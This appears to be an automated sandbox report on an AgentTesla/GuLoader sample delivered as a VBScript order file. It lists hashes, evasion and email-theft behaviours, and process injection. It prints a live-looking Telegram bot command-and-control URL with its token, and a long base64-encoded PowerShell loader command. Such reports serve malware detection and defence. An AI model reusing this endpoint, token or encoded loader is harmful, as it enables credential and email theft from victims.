agenttesla | 1eade2198b604a51fbefd8ead5b2fa124d8ce1423a866d84023372a46d4d2fd9

General

Target

Order_00361122.vbs
Size

276KB
MD5

8c99576af66faeb6ddf4f7c3f433e714
SHA1

ca49af12f2a1ec4c0e4e887175014278a2d5970d
SHA256

1eade2198b604a51fbefd8ead5b2fa124d8ce1423a866d84023372a46d4d2fd9
SHA512

02096dd72ca236ee53d7314003553c1fcb5ecb24b1fab5e527aded8c59453284e02d4d88c70a9d6d0d2d55aa8647cfb7e402558d8b6967f8247d5784330dcf55
SSDEEP

6144:3cvv8qMvgfGi81kO/4qRHKHaz+OTnH2aBRBu8M:3c3ofLiqRRz+SHl36

Score

10^/10

agenttesla guloader collection downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot2130601984:AAFbq9oRuTM0trTEQbxU_lfoBZ4A2S2DeD8/sendDocument

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.execaspol.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

caspol.exe

pid process

4300 caspol.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.execaspol.exe

pid process

1440 powershell.exe
4300 caspol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1440 set thread context of 4300 1440 powershell.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.execaspol.exe

pid process

1440 powershell.exe
1440 powershell.exe
4300 caspol.exe
4300 caspol.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exe

pid process

1440 powershell.exe
1440 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.execaspol.exe

description pid process

Token: SeDebugPrivilege 1440 powershell.exe
Token: SeDebugPrivilege 4300 caspol.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

caspol.exe

pid process

4300 caspol.exe

pid	process
4300	caspol.exe

pid	process
1440	powershell.exe
4300	caspol.exe

description	pid	process	target process
PID 1440 set thread context of 4300	1440	powershell.exe	caspol.exe

pid	process
1440	powershell.exe
1440	powershell.exe
4300	caspol.exe
4300	caspol.exe

pid	process
1440	powershell.exe
1440	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	4300	caspol.exe

pid	process
4300	caspol.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 4808 wrote to memory of 1440	4808	WScript.exe	powershell.exe
PID 4808 wrote to memory of 1440	4808	WScript.exe	powershell.exe
PID 4808 wrote to memory of 1440	4808	WScript.exe	powershell.exe
PID 1440 wrote to memory of 3880	1440	powershell.exe	csc.exe
PID 1440 wrote to memory of 3880	1440	powershell.exe	csc.exe
PID 1440 wrote to memory of 3880	1440	powershell.exe	csc.exe
PID 3880 wrote to memory of 388	3880	csc.exe	cvtres.exe
PID 3880 wrote to memory of 388	3880	csc.exe	cvtres.exe
PID 3880 wrote to memory of 388	3880	csc.exe	cvtres.exe
PID 1440 wrote to memory of 2408	1440	powershell.exe	caspol.exe
PID 1440 wrote to memory of 2408	1440	powershell.exe	caspol.exe
PID 1440 wrote to memory of 2408	1440	powershell.exe	caspol.exe
PID 1440 wrote to memory of 4300	1440	powershell.exe	caspol.exe
PID 1440 wrote to memory of 4300	1440	powershell.exe	caspol.exe
PID 1440 wrote to memory of 4300	1440	powershell.exe	caspol.exe
PID 1440 wrote to memory of 4300	1440	powershell.exe	caspol.exe

outlook_office_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

outlook_win_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order_00361122.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABMAGEAcABwAGUAbgBzAGYAaQAgAD0AIABAACcADQAKAEYAcgBkAGkAZwBBAEgAcwB0AHAAYQBkAFMAeQBtAGEAcwBkAEUAbgBtAGUAcwAtAFUAbABzAGUAbABUAEEAcgB0AG8AdAB5AGIAYQBuAGsAcgBwAEkAbgBmAHIAYQBlAFQAbwB0AGEAbAAgAFMAZwBlAG8AcAAtAFQAZQBtAHAAZQBUAHQAcgBrAHQAagB5AFQAcgBpAGMAaABwAEQAdQBuAHQAZQBlAE4AZQBkAGUAcgBEAEEAZwBlAG4AdABlAFMAdAByAGEAYQBmAEIAbABvAG8AZABpAFIAaQBwAGUAbgBuAHMAeQBsAGUAcwBpAEQAZQBsAHQAaQB0AEYAYQBuAHQAYQBpAEsAaABhAGQAaQBvAE0AaQBkAGQAZQBuAFAAYQByAGUAcwAgAFMAawBpAGYAZgBAAEcAcgBhAG4AZAAiAAoARgBlAHIAdABpAHUAUAByAGUAZABpAHMAUABvAGwAeQBtAGkAQwB1AHIAaQBvAG4AUwBrAHkAbgBkAGcAQwBvAHAAdABpACAAUwB0AHIAdQBrAFMAQQB0AG8AcAAgAHkAUAB5AGUAbABvAHMAQQB0AHQAZQBuAHQASAB5AGQAcgBvAGUAVQBuAGMAdQByAG0AUwBhAHIAdABvADsACgBiAHIAeQBnAGcAdQBUAG8AcgBwAGUAcwBPAHAAZQByAGEAaQBHAGUAcwB0AHUAbgBHAGkAZABzAGwAZwBCAGUAdgBnAGcAIABQAHIAZQBwAGUAUwBCAGUAbABhAGIAeQB1AG4AbQBlAGUAcwBSAGUAcwB1AHIAdABSAHkAdAB0AGUAZQBUAG8AbQBoAGoAbQBJAG4AdABlAHIALgBOAGUAdQB0AHIAUgBIAG8AcwB0AGEAdQBVAG4AZABlAHIAbgBWAGEAZwBhAGIAdABTAGgAbwB1AGwAaQBQAGEAdQBsAGkAbQBCAG8AcwBwAGgAZQBNAHkAZQBsAG8ALgBTAHUAYwBjAGUASQBPAHYAZQByAGQAbgBLAGwAZABlAGQAdABOAG8AbgBtAGEAZQBMAGYAdABuAGkAcgBTAGMAcgB1AHQAbwBBAGYAZwBhAHMAcABUAGUAdAByAGkAUwBwAGUAcgBlAG4AZQBCAGkAYwBlAHAAcgBMAG8AdAB0AGEAdgBQAGEAaQBuAGsAaQBQAHIAbwBiAGwAYwBTAHUAcABlAHIAZQBOAGEAdABpAG8AcwBVAGQAdgBlAGsAOwAKAEMAaABlAGMAawBwAEMAbABlAGEAdgB1AFIAZQBjAGgAZQBiAHUAbgBjAG8AbgBsAFMAaQBzAHMAaQBpAEoAZwBlAHIAbgBjAFYAaQByAGsAcwAgAFMAdABpAG4AawBzAFMAdQBiAGEAdAB0AEEAbQBwAGgAaQBhAFMAaQBiAGkAbAB0AFUAbgBvAHYAZQBpAEwAYQBuAHQAaABjAFMAbABpAGsAbQAgAEcAdQBzAHMAZQBjAEEAdQB0AG8AbQBsAFAAbABhAHMAdABhAFMAdQBwAGUAcgBzAE8AZQBrAG8AbgBzAEsAdgBhAGQAcgAgAFQAbwBpAGwAZQBFAFQAaQBnAGgAdABuAFQAYQBiAG8AdQB0AEYAbwByAGIAcgB3AHAAcgBvAGQAdQBpAEEAdAByAGUAcwAxAAoAVABhAHgAYQBlAHsAVAByAHkAawBtAFsAQQB1AHQAbwBvAEQAVAByAHkAcABzAGwAQgBpAHIAYwBoAGwARABvAGsAYgBhAEkAUwBlAHAAdABpAG0AVQBuAGQAbABpAHAAUwBhAGIAYgBhAG8ARABhAHQAYQBrAHIAQgBsAHUAcwBuAHQASQBuAGQAZQBrACgAYwBvAG8AcABlACIAUgBsAGkAZwBzAGcATABlAHAAdABvAGQATgBhAHQAdQByAGkARgBsAG8AZABoADMATQBvAHIAZwBlADIAQgBvAGQAawBpACIAUwBwAGkAZABzACkARgBvAHIAbQB1AF0ATgBvAG4AaQBuAHAARABlAHMAbQBhAHUARgByAG8AcwB0AGIAUwB0AHIAYQB0AGwAUAByAG8AdABvAGkARgBvAGIAaQBlAGMAUQB1AGEAZAByACAAQgBsAGsAawBsAHMAUwB1AG4AbABhAHQAUgBlAHQAcwByAGEARABlAGwAbwBtAHQAUABuAGUAdQBtAGkATQB1AG4AbQByAGMATQBhAHQAdABvACAAUABvAHQAYQBtAGUAUwBoAGUAcgBhAHgARABvAG4AcwB5AHQAdABhAGwAZQBsAGUAaQBuAGQAcwBuAHIATgBlAHcAcABvAG4AQgBlAGQAZQBzACAATABpAG8AdAByAGkAUABlAHIAaQBkAG4AUABhAHMAdAByAHQASABhAGwAdgBsACAASQBuAHQAZQByAEUAUABhAHQAZQByAG4AQgBlAHMAcgBnAHUAQgB5AGQAcgBlAG0ASQByAHIAZQBtAEYAdAByAGkAbwBuAG8ATwBhAGQAYQBsAG4ATABpAGcAbgBvAHQARABpAHMAbQBhAHMAVQBuAHUAcwB1ACgAVwBoAGUAbgBjAGkAVQBuAGQAdgByAG4AUwBrAGEAZgB0AHQAUgBlAGMAbwBtACAARQBmAHQAZQByAFUAQQBtAGkAYQBuAGQATgBhAGsAcwBrAGUATgBlAGQAZgByAG4AUwBhAG0AYQByAHIAQQB1AGcAbQBlACwAUAByAGkAbgBjAGkAQwBlAG4AcwB1AG4ATgBlAGIAZQBuAHQAQwBhAHIAcgBvACAAUwBpAG0AdQBsAEkAQQBnAGEAcABlAG4AUwBvAHIAZABpAGcATQBvAHIAZgBhAGUAUwBsAHMAZQByAG4ASQBuAGgAYQBiAGkAYgBsAGkAbgBrACwARgBsAGUAbgBzAGkAVgBzAGUAbgBzAG4ARwB1AGUAbABmAHQAVgByAGQAaQBvACAASABlAGwAYgByAEMARQB0AGUAcgBuAG8AUwB3AGUAZQB0AGkAQgBhAG4AcQB1AG4AVABhAGcAcgBlACwAQQBmAHYAcgBnAGkAZABlAHIAbwBwAG4ARgBvAHIAawB1AHQATQB1AG4AZABoACAATwBtAHYAZQBuAG4AQgBsAHUAZQBkAG8AYgBhAG4AawBvAG4ARABvAHcAZABpAG8ARwBsAHkAcAB0AGQARgBlAG0AdABlACkAQwB1AGMAdQBsADsACgBzAGsAaQBiAHMAWwBBAG0AbQBvAG4ARABGAGkAagBpAHMAbABMAG8AdgBnAGkAbABKAG8AdQByAG4ASQBVAG4AZAByAG8AbQBBAGMAZQBkAGkAcABDAG8AbgB0AHIAbwBSAGUAbgBzAGQAcgBVAG4AaABhAG4AdABTAGUAbQBpAHAAKABTAHQAZQBkAHMAIgBEAG8AYwB0AHIAdQBVAGQAcwBwAGkAcwBSAHUAcwBzAG8AZQBXAGEAcgBuAGkAcgBSAGUAdgBhAGwAMwBQAHIAbwBkAHUAMgBOAG8AZABpAGYAIgBHAGkAZgBsAGUAKQBDAGUAbABvAHQAXQBBAHIAYgBlAGoAcABCAHIAdQBuAGUAdQBQAGkAZQByAG8AYgB2AGUAcgBzAGkAbABSAGUAbgBzAGQAaQBEAGkAcwBvAGIAYwBCAGwAZQBoAGEAIABTAG0AdQBkAHMAcwBCAGwAYQBrAGUAdABUAHIAbwBuAHMAYQBVAGQAYgByAG4AdABQAGUAcgBzAGUAaQBOAHIAZQBuAGQAYwBMAGEAbQBpAG4AIABBAGYAaABvAHIAZQBSAGEAYQBkAGkAeABSAGUAbgB0AGUAdABNAGEAZABwAGEAZQBLAHIAYgBsAGkAcgBLAGkAbgBlAHAAbgBDAG8AbgBzAGMAIABNAGEAZwBpAHMAaQBHAGUAcgBhAGUAbgBJAGIAcgBuAGQAdABVAG4AbABhAGQAIABCAHUAcgBnAGcARwBVAG4AZABlAHMAZQBzAGMAYQBuAGQAdABCAGUAZgBhAHYAVQBCAGkAZABzAGEAcABGAGwAaQBjAGsAZABEAGUAZwBhAHMAYQBCAHIAbwBtAHUAdABQAGgAbwB0AG8AZQBBAGYAaABvAGwAUgBDAGEAYwBvAGMAZwBzAGUAZQBjAGEAbgBTAHAAaQByAG8AKABQAGEAbgBsAG8AaQBVAG4AcwB1AGIAbgBPAGYAZgBlAHIAdABzAGkAcgB1AGUAIABGAHUAawBzAHMAVABTAHcAZQBlAHAAcgBQAGgAbwBzAHAAaQBSAGEAcABzAGMAcABhAHAAcAByAGUALABNAGkAcwBsAGUAaQBDAGEAcwBhAHMAbgBSAGEAcABzAG8AdABOAGUAcABhAGwAIABOAGkAYwBoAGkAQgBQAGEAcgByAHkAYQBVAHIAYgBhAG4AcgBGAGEAcwB0AGwAbgBUAHIAdQB4AGkAYQBGAGEAawB1AGwALABQAHIAbwB2AGUAaQBHAGEAcwB0AHIAbgBVAG4AcgBlAGQAdABSAGUAbQBpAHMAIABVAG4AYwBvAG4ASABWAGEAbABsAGUAbwBLAHIAcwBlAGwAcwBZAGEAYwBoAHQAcABiAHUAbABsAHcAKQBPAGQAbwBuAHQAOwAKAEIAaQBvAHQAZQBbAFMAcABsAGkAbgBEAFIAZQB0AHIAdABsAFAAbABvAHUAZwBsAFAAcgBlAHIAZQBJAGQAaQBvAHAAdABtAFMAYQBkAGQAZQBwAE0AbwBuAG4AaQBvAEEAawB0AHIAZQByAFYAYQBsAGcAawB0AEUAbgB0AHIAZQAoAFAAbwBzAHQAYwAiAE4AeQBkAGUAbgB1AFAAbgBzAGsAZQBzAEEAbABkAGUAcgBlAFYAZQBsAHYAZQByAEgAZQByAG0AYQAzAE0AbwBqAG8AcwAyAFMAbgBhAGUAdgAiAEIAZQBnAHIAdQApAFQAaQB0AGEAbgBdAFAAcgBlAHMAcwBwAGgAZQB0AGUAcgB1AFMAZwBlAHAAcgBiAFAAbwBtAG0AZQBsAFMAbgBvAGcAIABpAE4AZQBjAGUAcwBjAEcAcgBlAGIAbgAgAEIAcgBpAG4AZwBzAFIAbwBxAHUAZQB0AFMAZQBrAHMAdQBhAFMAaQBnAG4AYQB0AEMAYQBsAGEAbQBpAEcAZQByAGgAYQBjAE8AdQB0AHQAbwAgAGYAagBlAGwAZABlAE4AbwBuAHAAdQB4AEwAYQBtAGUAYgB0AEgAeQBwAGUAcgBlAFMAZQB2AGkAZwByAGEAbgBuAGUAeABuAFQAcgBhAGMAdAAgAEsAdQByAHYAZQBpAE0AbwBlAG4AdABuAFIAaABlAGkAbgB0AGEAbgBvAHAAbAAgAE0AYQBuAHUAZgBMAEQAdQBlAGwAbABvAEQAaQBzAGUAdQBvAEwAbwBuAGcAdQBrAEIAaQByAGsAZQB1AEMAcgB1AHMAaABwAEMAYQBsAG8AcgBJAEcAcwB0AGUAbwBjAHMAdQBzAHAAaQBvAEwAaQBiAGUAcgBuAFIAYQB2AGUAbABJAFQAcgBrAHAAcgBkAE0AZQBuAHQAZQBGAEYAbwByAGgAYQByAEIAbwB3AGUAcgBvAEYAcgBlAG0AbQBtAEcAeQByAG8AYwBEAFMAbABpAG0AZQBpAEgAagByAG4AZQByAEQAZQBwAHIAZQBlAHAAcgBvAHYAbwBjAE0AaQBtAG8AcwB0AE4AbwB0AGUAdwBvAEsAbgBpAHAAbAByAEsAdQBsAHQAdQB5AFQAaAB1AHIAcgAoAE8AbwBwAGgAeQBpAEIAZQBqAGEAZQBuAE4AbwBuAGMAYQB0AEEAZgBzAHAAbgAgAFMAaQBuAG4AaQBLAEMAeQBjAGwAbwBhAEkAbgBzAGUAbQBpAEYAbwByAHMAdgByAEEAdQB0AG8AcgBlAEIAZQBkAHUAbQB0AFMAawBpAGwAbAAsAHAAYQBsAGUAbwBpAFMAaQBuAGUAYwBuAFcAcgBhAGkAdAB0AE0AbwBuAGUAcgAgAFAAaABhAG4AdABLAEkAbQBwAGwAYQBsAHUAbgBkAGUAcgBhAGoAbwBiAG4AYQB0AHMAdABhAHIAdAB0AFMAawBpAHAAdAApAEMAeQB0AG8AawA7AAoAcAByAG8AbABvAFsARQBuAHYAbwB5AEQATwBwAHAAbwByAGwATQBpAG4AaQBzAGwARABpAHMAYwBvAEkARwB5AG4AZQBjAG0AbgBlAGQAcwBhAHAAQgByAG4AZQBwAG8AUwB1AGIAbwBwAHIAUwBlAGwAZQB1AHQAQQBiAGIAYQBzACgATwB2AGUAcgB3ACIATQBvAG4AbwBsAGsAQQBhAGsAZQAgAGUAVwBvAG8AbABnAHIAQQBlAGMAaQBkAG4AVQBuAGgAaQBlAGUASQBuAGQAbABlAGwARABlAHAAaQBsADMARABhAG0AbgBpADIAQgByAG4AZQB0ACIAVAByAGkAYgB1ACkAQwBsAGkAZgBmAF0AZABlAHMAaQBnAHAASwB2AGEAbAB0AHUARABpAGwAZQB0AGIATgBlAHMAdABhAGwAVQBkAHMAYQBuAGkAUABlAG4AZABlAGMAZwBlAHMAagBmACAASgB1AGQAZwBlAHMARQBtAGEAbABqAHQARQB4AHQAcgBhAGEAQQByAHIAYQBpAHQARgBvAHIAdgBpAGkAVwBhAGcAZwBpAGMARwB5AG4AZQBjACAATQBlAHIAYwB1AGUATwBtAG8AcABsAHgATQBlAHIAaQBkAHQAUwB1AGIAcABsAGUARwByAGEAZABhAHIATgBvAG4AYQBkAG4ARQBmAHQAZQByACAATwB1AHQAcwB0AGkAQQBuAHQAaQBjAG4AUAByAG8AZwByAHQARwBsAGEAbQBvACAAQwByAGUAYQB0AFYAVgByAHYAbABlAGkAbQBvAHUAbgB0AHIAUAByAGkAbwByAHQATQB1AGQAZABlAHUAQgBhAG8AYgBhAGEATgBhAHYAbgBlAGwAVABpAGwAdAByAEEAVQBkAHMAawBpAGwAVABvAGsAbwBtAGwAQQB0AHIAZQBwAG8AQQBpAHYAcgAgAGMARgByAGkAYQBmACgASQBuAHQAZQBsAGkAcABlAHIAcwBvAG4AQgBlAHYAbwBnAHQASQBuAGQAZwByACAAVgBhAG4AZABlAHYAUAB1AHIAYwBoADEARAByAGEAbgBrACwARQByAGgAdgBlAGkAUwB1AG4AZABhAG4AUABhAHQAZQB0AHQAYQByAGIAZQBqACAARABpAGEAbABlAHYASwBuAGEAcABzADIASAB5AHAAbwBzACwAdABpAGwAZgByAGkAVgBpAG8AbABlAG4ATgBvAHIAaQBlAHQAQwBvAHIAbwBsACAAUgBlAHMAZQByAHYAQgByAG4AZABlADMAVQBuAGQAZQByACwAUwBqAGIAZQByAGkAZQBwAGkAZABlAG4ARABlAGwAZgB1AHQAUABsAGkAZwB0ACAAcwB5AHMAdABlAHYAVABvAHAAcABvADQAdwBhAGcAZQBwACkAUwB5AHIAbgBlADsACgBTAHUAYgBlAHIAWwByAGUAZwBpAHMARABNAHUAbAB0AGkAbABGAGwAaQBkAGQAbABTAHcAYQBzAGgASQBTAHUAbgBkAGgAbQBiAHIAcwBuAHkAcABGAG8AcgB0AHkAbwBCAGUAdABqAGUAcgBVAG4AZABlAHIAdABIAG8AdgBlAGQAKABIAGUAawBzAGEAIgBUAGUAcwB0AGEAdQBTAGIAZQBmAGEAcwBSAGUAZgBvAHIAZQBCAGUAbgBkAGkAcgBCAHUAdABpAGsAMwBVAG4AbQBhAGMAMgBCAGwAbwBrAHQAIgBBAHUAdABvAGMAKQBUAGEAZQBsAGwAXQBGAGUAcgBzAGsAcABTAGsAdQBtAHIAdQBTAGsAYQBtAGwAYgBTAGUAbQBwAGkAbABCAGUAbgB6AGkAaQBMAGEAdgB0AHIAYwBBAGYAdgBpAGsAIABBAGMAaABlAHIAcwBUAGkAbABzAHYAdABNAGEAbgB0AGkAYQBlAGcAZQBuAGMAdABUAHYAaQBuAGQAaQBFAG0AZABlAG4AYwBBAGwAYQByAG0AIABTAHAAcgBuAGcAZQBEAG8AbgBlAHMAeABCAGUAZgBzAHQAdABTAHUAYgBkAG8AZQBQAGkAbgBuAGUAcgBGAHoAIABDAGgAbgBQAGwAYQBzAG0AIABTAHAAbABlAGoAaQB0AGkAbgBzAG8AbgBTAGEAbgBpAHQAdABKAGUAcgBuAGIAIABCAGwAcwBlAGIARABLAGEAbQBlAHIAZABNAG8AdQBzAHMAZQBGAGEAcgBvAGUARgBSAGUAdABzAGgAcgBBAGQAdgBpAHMAZQBBAGcAcgBlAHMAZQBSAGUAYwBlAHMAUwBTAGUAcQB1AGEAdABJAG4AZAB1AHMAcgBVAGQAcwBsAHkAaQBLAGEAcABpAHQAbgBPAHAAcwBwAGwAZwBCAGkAbgBnAG8ASABQAHIAZQBmAHIAYQBTAHUAYgBjAGwAbgBOAG8AcgBkAGwAZABSAGUAcwB1AHIAbABQAGwAdQBtAHUAZQBkAGEAdABhAHIAKABUAHIAaQBsAGwAaQBWAGEAcwBrAGUAbgBVAG4AbQBpAHMAdABtAG8AbgBvAGUAIABPAG0AawBvAHMAZABPAHUAdABzAHAAaQBUAGgAZQByAGsAYQBUAGUAYQBtAGUALABVAG4AZABlAHIAaQBiAHIAbgBkAGUAbgBQAG8AbABhAHIAdABTAGsAdQBkAHMAIABPAG0AYgB5AHQATABoAGUAawBzAGUAZQBTAHEAdQBlAGEAdgBTAGsAaQBmAHQAZQBKAGEAdgBlAGwAbgBCAGEAbABsAG8AKQBxAHUAIABzAHAAOwAKAE0AYQBnAGUAIABbAFMAaQBuAG8AcgBEAFUAZAByAGEAbgBsAE0AYQBhAGQAZQBsAFAAcgBlAG8AZgBJAFAAYQBsAGEAdABtAEgAdgBuACAARQBwAFMAbwByAHQAaQBvAEMAaQByAGMAdQByAFQAZQBsAGUAcgB0AEYAZQBzAHQAbQAoAFIAZQBhAHAAcAAiAEgAdQBzAGIAYQBtAEgAZQByAG8AaQBwAEUAZgB0AGUAcgByAHAAcwB5AGMAaAAuAEIAbABhAGQAawBkAEIAcgB1AGcAcwBsAEcAYQBsAGEAcgBsAEgAdQBnAHUAZQAiAFIAYQBkAGsAbgApAEQAaQByAHQAYgBdAGYAcgB1AGMAdABwAEQAZABtAGEAbgB1AEUAcgBoAHYAZQBiAHQAaQBsAGgAbgBsAFMAawBvAHMAcABpAE4AbwBuAGYAbwBjAFAAZQBuAG4AYQAgAEYAbwBsAGsAZQBzAEcAYQBzAHMAaQB0AGgAZQB4AGEAcABhAE0AYQByAHMAaAB0AEUAbgBjAGwAbwBpAFAAcgBvAHQAZQBjAEIAaQByAGwAaQAgAFMAdABhAHQAdQBlAFUAcwB5AG4AbAB4AEYAbAB1AG4AawB0AEsAYQB0AGoAYQBlAEMAYQBtAGUAcgByAFMAYQBiAGIAYQBuAEQAZQBjAGEAeQAgAHAAbABlAGoAZQBpAFMAZQBhAG0AbABuAEoAbwB1AHIAbgB0AFQAcgBvAG0AbQAgAE0AbwBvAG4AZQBXAFMAYQBtAG0AZQBOAFIAZQBsAGkAZQBlAFMAZQBsAHYAbQB0AE4AbwB0AGEAcgBDAEQAaQBzAGYAYQBsAEQAZQBmAGUAbgBvAEEAaQByAGIAbwBzAEMAbwBzAHQAZQBlAE0AaQBsAGkAdABFAFQAYQBnAGQAawBuAEwAbwBiAGEAbAB1AEkAbgBkAGsAYQBtAEMAZQBuAG8AZwAoAFMAdQBjAGMAZQBpAFQAcgBpAHQAbwBuAEMAYQBsAG8AcgB0AEMAaABhAHAAYQAgAFAAYQByAHQAcgBCAE4AbwB2AGUAbAB2AFYAYQByAG0AZQByAFMAawBhAG4AZABlAFUAbgBkAGUAbgAxAE8AcgBkAHIAZQAyAEMAbwBvAGwAaAA0AE0AZQB0AGEAcAApAEcAZwBlAGQAYQA7AAoAQwBoAGEAcgBsAFsAQgBsAG8AZABkAEQASABhAGwAZQBzAGwAdAByAG8AdQBiAGwAUABpAGwAbwB0AEkAUgBlAGcAcgBlAG0ARgBhAGcAbwBtAHAAQgBpAGwAbABlAG8AUgBlAHAAcgBlAHIATQBlAGoAcwBsAHQASwBvAG0AbQB1ACgAUwB3AGkAZgB0ACIAQQB0AHQAcgBpAGsARwBsAHUAYwBrAGUATQB1AGwAaQBnAHIAQwBoAGkAYwBxAG4ATwBwAHMAcAByAGUARgByAHMAdABlAGwASABpAHIAZABzADMAUwBtAGUAbAB0ADIARgBhAGcAdABpACIAVABhAGoAZwBhACkAYgBhAHMAdABpAF0ASQByAHIAZQBjAHAAQQBuAGEAcABsAHUARgBvAHIAawB0AGIAQgBlAGEAbgBlAGwATQB1AHMAawBlAGkAUABvAHMAdABhAGMAVwBpAGwAZAB3ACAASABvAGIAbwBzAHMAUgBlAG0AZQB4AHQAUwB0AGEAYQBsAGEAQQB3AGEAcgBlAHQATQBpAGUAawBlAGkAQgBpAHUAbgBpAGMARgByAGUAZwBuACAATgBpAGQAZABpAGUAQgBpAG8AZQBuAHgAUwB2AGUAcgBpAHQAQgBlAHMAbABhAGUAUgBhAHYAZwBhAHIAQwBoAGEAcgBsAG4AQgBlAGIAcgBlACAARgBpAGYAdAB5AHYAQgBsAHUAcgByAG8ARABlAHMAZQByAGkARABvAHMAZQByAGQAQQBuAHMAZQB0ACAAUgBhAGMAaABpAEkASQBuAGYAbAB1AG4AUABzAHkAYwBoAGkARwB1AGQAcwB0AHQAQQBuAHQAaQBzAGkARAB5AGsAbgBkAGEAVAB2AGEAbgBnAGwAQQB1AHQAbwBlAGkAZQBqAGUAcgBzAHoATABlAG8AbgBhAGUAUwB0AGEAbgBnAEMASABlAHAAYQByAHIASABhAHcAawBiAGkARABhAGcAcABlAHQAVQBuAGIAbABpAGkATwB2AGUAcgBzAGMAUABlAGQAaQBwAGEAVwBoAGkAbgB5AGwAUwB0AHMAbABhAFMAUgBhAHYAZQBsAGUAUwB0AGkAbABsAGMARABlAHMAZQByAHQAZwBpAG0AbQBpAGkAQwBvAG0AcAB1AG8ARQByAGgAdgBlAG4AbABvAHYAZgBvACgAdABlAG4AYQAgAGkATAB1AGsAawBlAG4AcwBrAG8AdgBsAHQAVABlAGUAdABoACAAVABqAGUAbgBzAE0AUgBhAGYAdABlAGkASABvAHAAcABlAGwAVAB5AGYAbwBuACkAQwBsAGUAaQBzADsACgByAGUAdABhAHIAWwBBAGEAcgBzAG8ARABaAHUAbgBpACAAbABTAHQAbgBrAGUAbABCAG8AcgB0AGYASQBGAGEAcwBlAHIAbQBIAGYAdABlAHMAcABBAGMAYwB1AHMAbwBQAGEAdAByAG8AcgBLAG8AbgBzAGUAdABDAGgAYQBzAGUAKABNAHUAcwBpAGsAIgBHAHIAdQB0AHQAawBTAHQAaQBrACAAZQBrAGUAdAB1AHAAcgBTAGwAdgB2AHIAbgBHAHIAZQB2AGkAZQBMAGUAbgBhACAAbABTAHQAaQBsAGUAMwBoAG8AbQBpAG4AMgBUAGEAcABpAG4AIgBaAGEAbgBpAGEAKQBXAGkAdABoAGUAXQBPAG4AeQBtAGEAcABSAHUAbQBmAGEAdQBEAGkAcABoAGEAYgBNAGUAcgBjAGUAbABGAGkAcwBrAGUAaQBCAGwAZQBhAGsAYwBGAG8AcgBoAGEAIABzAG0AYQByAHQAcwBHAGEAbAB2AGEAdABQAGEAbgB0AG8AYQBEAGUAbQBpAGwAdABLAG8AbQBtAGEAaQBCAGUAdAByAG8AYwBHAGUAaAByAHMAIABFAHkAZQBzAHAAZQBTAGUAawByAGUAeABDAG8AbABhACAAdABUAGUAbABlAGYAZQBTAHQAZQBuAHQAcgBCAG8AZwBzACAAbgBGAG8AcgBzAHQAIABLAHYAYQBkAHIASQBDAHkAYwBsAG8AbgBSAHUAZgBmAGUAdABmAG8AcgBmAGkAUABDAGEAbABsAG8AdABNAGkAcwBhAGQAcgBTAG8AcgB0AGkAIABHAHIAaQBsAG4ARQBTAGgAaQBwAHAAbgBzAHQAbwBkAGcAdQBNAGUAdABhAHIAbQBhAG4AbgBhAGwAUwBNAGUAdABhAGwAeQBQAGwAYQBkAHMA